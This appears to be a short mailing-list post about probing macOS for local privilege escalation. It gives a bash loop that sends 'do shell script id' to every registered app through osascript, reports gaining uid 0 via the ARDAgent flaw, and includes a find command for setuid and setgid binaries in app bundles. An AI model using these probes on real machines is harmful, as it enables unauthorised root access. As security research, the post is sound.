I was looking for a way to "tell app"s to do stuff, and came up with
this: Beware this may lock you out of your machine so make sure you
have ssh running or something...
This is a bash loop:
for x in `/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister
-dump | grep identifier | sed -e's/.*identifier: *\(.*\)(.*).*/\1/' |
sort -u` ; do ( echo "App ID:" $x ; osascript -e 'tell app id "'${x}'"
to do shell script "id"'; ) >> osascript.log ; done
Looks like doing tell app id com.apple.LockScreen to do shell script
id will lock your OSX UI out with the nice giant padlock icon that
they use in screen sharing to lock out the local user. This loop got
uid 0 via ARDAgent on a box still vuln to the ARDAgent issue. It did
not find a second one.
I started out looking for setuid binaries at paths matching
Myapp.app/Contents/Macos/Myapp -- there seemed to be none that were
setuid iirc -- there were a few setgid tho. That search was done like
so:
find / -type d -regex .*\.app -print0 -exec find {} -perm -4000 -o
-perm -2000 \;
In my testing, I have not yet been able to get a setgid procview
process run from any of the setgid binaries (with this stupid
applescript stuff).
| 